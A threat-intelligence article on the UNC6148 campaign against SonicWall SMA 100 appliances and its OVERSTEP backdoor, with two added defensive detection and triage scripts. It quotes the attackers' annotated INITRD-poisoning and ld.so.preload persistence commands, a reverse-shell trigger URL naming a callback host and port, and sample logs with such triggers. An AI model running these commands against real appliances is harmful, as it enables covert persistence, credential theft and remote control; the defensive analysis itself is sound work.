SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware

SonicWall’s end-of-life SMA 100 series appliances are again on the front line after investigators unearthed a covert campaign that couples a suspected zero-day remote-code-execution flaw with a sophisticated backdoor called OVERSTEP.

The operation, attributed to the financially motivated group UNC6148, first steals administrator credentials and one-time-password seeds, then pivots to full device compromise before exfiltrating data and preparing for ransomware deployment.

The attack chain begins with a burst of HTTP requests that ultimately hands the adversary a shell on the appliance—an action that should be impossible under normal conditions.

Google Threat Intelligence analysts noted that once the shell is active the intruder exports the device’s configuration, quietly injects malicious rules, and uploads a base64-encoded binary into the persistent /cf partition.

The binary is later copied to /usr/lib/libsamba-errors.so.6 and its path written to /etc/ld.so.preload, so the dynamic loader maps it into every dynamically linked process on the appliance, including those running as root, before the process's own code executes.

Investigators believe the credentials UNC6148 arrived with were most likely harvested through one of several long-standing SMA vulnerabilities whose exploits are routinely traded in crime forums; the exact vector that produced the shell itself remains unconfirmed, which is why a zero-day is suspected.

Table 1 summarises the most relevant bugs, each providing either a direct code-execution path or a credential-theft path, that related campaigns have exploited since 2021.

CVE | Year | Auth required? | Type | Key impact | Patch status
--- | --- | --- | --- | --- | ---
CVE-2021-20038 | 2021 | No | Memory corruption (stack-based buffer overflow) | Unauthenticated remote code execution | Patched Dec 2021
CVE-2024-38475 | 2024 | No | Path traversal (Apache mod_rewrite) | Dump temp.db and persist.db to steal passwords and OTP seeds | Patched Feb 2025
CVE-2021-20035 | 2021 | Yes | OS command injection | RCE via the /cgi-bin/sitecustomization handler | Patched April 2021
CVE-2021-20039 | 2021 | Yes | OS command injection | RCE via the /cgi-bin/viewcert handler; linked to Abyss ransomware | Patched Dec 2021
CVE-2025-32819 | 2025 | Yes | Arbitrary file deletion | Resets the built-in admin password to "password" | Patched May 2025

The shell commands OVERSTEP runs when it sees the dopasswords keyword show how it bundles the credential databases (temp.db and persist.db) into a TAR archive placed under a web-reachable directory, so the attacker only has to download it over HTTPS.

Persistence Tactics: Hijacking the Boot Sequence

Once a foothold is secured, UNC6148 cements persistence by rewriting the bootCurrentFirmware() routine inside /etc/rc.d/rc.fwboot.

The modified script decompresses and loop-mounts the device's initial RAM disk (INITRD), plants the trojanised library together with an /etc/ld.so.preload entry inside it, and repacks INITRD.GZ so the rogue code is loaded before any legitimate service starts.

A timestamp "touch" operation then aligns the repacked file's dates with those of the official kernel image, defeating quick metadata comparisons.

# Extract and poison INITRD
gzip -d $fwLoc/INITRD.GZ                                # decompress the initial RAM disk image
mount -o loop $fwLoc/INITRD $fwLoc/zzz                  # loop-mount it so its files can be edited in place
cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/         # plant OVERSTEP from the persistent /cf partition
echo /usr/lib/libsamba-errors.so.6 > $fwLoc/zzz/etc/ld.so.preload   # force-load it into every dynamically linked process
umount $fwLoc/zzz && gzip $fwLoc/INITRD                 # repack; gzip writes INITRD.gz
mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ                    # restore the filename the boot path expects
/usr/local/sbin/kexec -l $fwLoc/BZIMAGE --append="`cat $fwLoc/LINUX.OPT`"   # stage the kernel with the saved boot options
/usr/local/sbin/kexec -e                                # jump into the staged kernel

When the appliance reboots, every dynamically linked binary, including the web server responsible for logging, links against the malicious library.

OVERSTEP hooks open and open64, readdir and readdir64, and write: the open and readdir hooks hide its own files from file reads and directory listings, while the write hook inspects every buffer the process writes for the strings dobackshell or dopasswords.

A single HTTP GET such as https://device/query?q=dobackshell,1.2.3.4,4444 spawns a reverse shell to the given host and port, and the request leaves no trace in the on-disk logs because the hijacked write call drops the matching log entries before they reach the log files.
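Because the hooked write call strips those keywords from the appliance's own logs, the place to hunt for them is whatever sits in front of the SMA: a reverse proxy, load balancer, SIEM feed or packet capture. The script below is an added example, not code from the article or from Google's report; it scans such an upstream access log for the OVERSTEP triggers and extracts the reverse-shell callback host and port. The log lines, the /query path, the timestamps and the 203.0.113.x / 198.51.100.x addresses are constructed for illustration.

```shell
#!/bin/sh
# Added example (not the article's or GTIG's code): scan an upstream web access
# log for OVERSTEP trigger keywords. Meant for logs kept outside the appliance,
# since the on-box logs are scrubbed by the hooked write().

# Print one "dobackshell <ip> <port>" line per distinct reverse-shell trigger.
# Percent-encoded commas (%2C) are decoded first so an encoded request is not missed.
overstep_backshell_callbacks() {
    sed 's/%2[Cc]/,/g' "$1" \
      | grep -oE 'dobackshell,[0-9]{1,3}(\.[0-9]{1,3}){3},[0-9]{1,5}' \
      | sort -u | tr ',' ' '
}

# Print the number of requests carrying the dopasswords keyword
# (each one asks OVERSTEP to build the credential-database archive).
overstep_password_dumps() {
    grep -c 'dopasswords' "$1" || true
}

# Constructed sample log in Common Log Format; paths, addresses and timestamps
# are illustrative only. Writes to a temp file and prints its path.
overstep_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.77 - - [14/Jul/2025:09:12:01 +0000] "GET /cgi-bin/userLogin HTTP/1.1" 200 512
203.0.113.77 - - [14/Jul/2025:09:12:44 +0000] "GET /query?q=dobackshell,203.0.113.10,4444 HTTP/1.1" 200 18
203.0.113.77 - - [14/Jul/2025:09:13:05 +0000] "GET /query?q=dobackshell%2C203.0.113.10%2C4444 HTTP/1.1" 200 18
203.0.113.77 - - [14/Jul/2025:09:15:02 +0000] "GET /query?q=dopasswords HTTP/1.1" 200 18
198.51.100.5 - - [14/Jul/2025:09:16:30 +0000] "GET /images/logo.png HTTP/1.1" 200 2048
EOF
    echo "$f"
}

# Stand-alone run: report on the constructed sample log.
log=$(overstep_sample_log)
echo "reverse-shell callbacks:"
overstep_backshell_callbacks "$log"
echo "dopasswords requests: $(overstep_password_dumps "$log")"
rm -f "$log"
```

Against the sample the first function prints a single "dobackshell 203.0.113.10 4444" line (the plain and percent-encoded requests collapse to one callback) and the second reports one dopasswords request. Any callback address it returns is a candidate attacker host worth checking against firewall egress logs for an outbound connection from the appliance on that port.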

The result is a resilient foothold: even fully patched appliances can be re-compromised as long as stolen credentials remain valid.

Google’s analysts urge defenders to image disks offline, rotate every password and OTP seed, and verify the absence of /etc/ld.so.preload; its very existence on SMA hardware is “tantamount to compromise”.
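The boot-hijack procedure above and the advice to verify the absence of /etc/ld.so.preload both reduce to the same offline check. The script below is an added example, not the article's or Google's code: pointed at the directory where an appliance disk image (or its extracted INITRD) is mounted read-only, it looks for the preload file, the libsamba-errors.so.6 library in its two known locations, a rc.fwboot that references either, and any TAR archive bundling temp.db or persist.db. It must be run against an offline image, because on a live appliance OVERSTEP's readdir and open hooks hide exactly these files. The fixture it builds for its own demo run is constructed, and the /www/tmp path in it is an assumption rather than a real SMA directory.

```shell
#!/bin/sh
# Added example (not the article's or GTIG's code): offline triage of a mounted
# SMA 100 root filesystem for the OVERSTEP indicators the article describes.

# Print one line per indicator found under the mounted root; prints nothing if clean.
overstep_triage() {
    root=${1%/}
    # 1. /etc/ld.so.preload has no legitimate reason to exist on an SMA appliance.
    if [ -f "$root/etc/ld.so.preload" ]; then
        echo "ld.so.preload present: $(tr '\n' ' ' < "$root/etc/ld.so.preload")"
    fi
    # 2. The OVERSTEP library, on the live root and in the /cf staging area.
    for p in /usr/lib/libsamba-errors.so.6 /cf/libsamba-errors.so.6; do
        if [ -e "$root$p" ]; then
            echo "OVERSTEP library: $p"
        fi
    done
    # 3. The boot script should never mention the preload file or the library.
    if [ -f "$root/etc/rc.d/rc.fwboot" ] && \
       grep -qE 'ld\.so\.preload|libsamba-errors' "$root/etc/rc.d/rc.fwboot"; then
        echo "rc.fwboot modified to plant preload library"
    fi
    # 4. Any TAR archive bundling the credential databases (output of dopasswords).
    find "$root" -type f -name '*.tar' 2>/dev/null | while read -r t; do
        if tar -tf "$t" 2>/dev/null | grep -qE '(temp|persist)\.db$'; then
            echo "credential archive: ${t#"$root"}"
        fi
    done
    return 0
}

# Number of indicators, so callers can branch on it.
overstep_indicator_count() {
    overstep_triage "$1" | wc -l | tr -d ' '
}

# Constructed fixture: a fake root in a temp dir carrying four indicators
# (preload file, library under /usr/lib, modified rc.fwboot, credential TAR).
# The /www/tmp location is an assumption for the demo only.
overstep_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/rc.d" "$d/usr/lib" "$d/cf" "$d/www/tmp"
    echo /usr/lib/libsamba-errors.so.6 > "$d/etc/ld.so.preload"
    : > "$d/usr/lib/libsamba-errors.so.6"
    printf 'bootCurrentFirmware() {\n  cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/\n}\n' \
        > "$d/etc/rc.d/rc.fwboot"
    : > "$d/www/tmp/persist.db"
    (cd "$d/www/tmp" && tar -cf creds.tar persist.db && rm persist.db)
    echo "$d"
}

# Stand-alone run: triage the root given on the command line, or the fixture.
if [ $# -gt 0 ]; then
    overstep_triage "$1"
else
    demo=$(overstep_fixture)
    overstep_triage "$demo"
    rm -rf "$demo"
fi
```

On the fixture the triage prints four lines and a clean root prints none. A hit on any one of the first three checks is sufficient grounds to treat the appliance as compromised and start the credential and OTP-seed rotation; the archive check is there because it tells you whether the dopasswords stage was actually reached.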
